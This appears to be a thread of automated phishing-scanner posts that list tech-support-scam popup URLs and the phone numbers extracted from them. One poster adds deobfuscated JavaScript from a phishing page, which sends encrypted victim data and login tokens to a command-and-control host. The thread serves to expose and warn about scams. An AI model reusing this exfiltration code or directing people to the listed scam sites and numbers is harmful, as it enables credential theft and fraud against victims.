FearToxin Scanner Popup Thread

This popup has been identified by the FearToxin Phishing Scanner.
This may be a false positive, you are responsible for verifying the numbers you call. These numbers have not been confirmed by humans! If you call, please respond to this message and let others know the number works.

URL: https://3128.pages.dev/
Extracted Nums:
+18884003128

URL: https://moramipharmacy.blob.core.windows.net/moramipharmacy/index.html
Extracted Nums:
N/A

URL: https://ncvbgzbsfcdrwtgbchyqbcnhdmksuyfsvcxfsn.rest/
Extracted Nums:
+18447875856

Domain Host: GoDaddy
Domain IP: 162.241.123.127 (US)
Carrier: Vonage

URL: https://il3q223.pages.dev/
Extracted Nums:
+12137996062

URL: https://www.call-support-number.com/
Extracted Nums:
+18653669022

URL: https://www.callhelpsupport.com/
Extracted Nums:
+18608018191

Yeah silently taking info, I got the c2 server that it’s going to, was deep through a few layers of base64ing and basic client side encryption:

    const makeRequest = (retryCount) => {
        return new Promise((resolve, reject) => {
            currentreq = $.ajax({
                url: 'https://ZysPkjKyfdiPqW35Iq0hJL9GgaU3cXJ1w1BB0nWzqVqSpwLQeWHu5j.ceaja.sa.com/42557199546964580RNGvlJVaylAVWSZMQJTJNDLWURCNONBAZOSHLUDZRQMVNVLQQYODLJ' + randroute,
                type: 'POST',
                data: {data: encrypteddata},
                success: function(response) {
                    if (response.message == "Token Not Found" && retryCount < 3) {
                        console.log('data: '+formattedargs);
                        setTimeout(function(){
                            resolve(makeRequest(retryCount + 1));
                        }, 3000);
                    }
                    if (response.message == "Missing Value") {
                        resolve('missing value');
                    }
                    if (response.message !== "Token Not Found") {
                        let decryptedresp = JSON.parse(decryptData(response));
                        if(route !== "twofaselected"){
                            if (decryptedresp.token) {
                                token = decryptedresp.token;
                            }
                        }
                        if (decryptedresp.message == "Token Not Found" && retryCount < 3) {
                            console.log('data: '+formattedargs);
                            setTimeout(function(){
                                resolve(makeRequest(retryCount + 1));
                            }, 3000);
                        } else {
                            // console.log(decryptedresp);
                            requestsent = false;
                            resolve(decryptedresp);
                        }
                    }
                },
                error: function(xhr, status, error) {
                    requestsent = false;
                    console.error('Error:', error);
                    reject(error);
                }
            });
        });
    };
    return makeRequest(0);
}
};

This popup has been identified by the FearToxin Phishing Scanner.
This may be a false positive, you are responsible for verifying the numbers you call. These numbers have not been confirmed by humans! If you call, please respond to this message and let others know the number works.

URL: https://appleweb.pages.dev/
Extracted Nums:
+15734272835

URL: https://applecybercop.pages.dev/
Extracted Nums:
+18554443340

URL: https://dwefdz.pages.dev/
Extracted Nums:
+12137996062

URL: https://jjadfj.pages.dev/
Extracted Nums:
+18884003128

URL: http://market.dratassianaalves.com.br/
Extracted Nums:
N/A

URL: https://antpb1btnrcf7qcq88bwbyqjq8pxni0zyurik.dratassianaalves.com.br/
Extracted Nums:
N/A

URL: https://afdwqqad.pages.dev/
Extracted Nums:
+12137996062

URL: https://5ejs50p1rcogbxp3qpij4rly3tldo6xsdn9zq.dratassianaalves.com.br/
Extracted Nums:
N/A

URL: http://www.ilgvb99ojobncvcmjibaxrdi1o5vywxe996kg.dratassianaalves.com.br/
Extracted Nums:
N/A

URL: https://www.wndoaylvjcvginisi54mraavgpeoafbcxvhot.dratassianaalves.com.br/
Extracted Nums:
N/A

URL: https://jhggy.pages.dev/
Extracted Nums:
+12137996062

URL: https://wrfwqcaw.pages.dev/
Extracted Nums:
+18086462285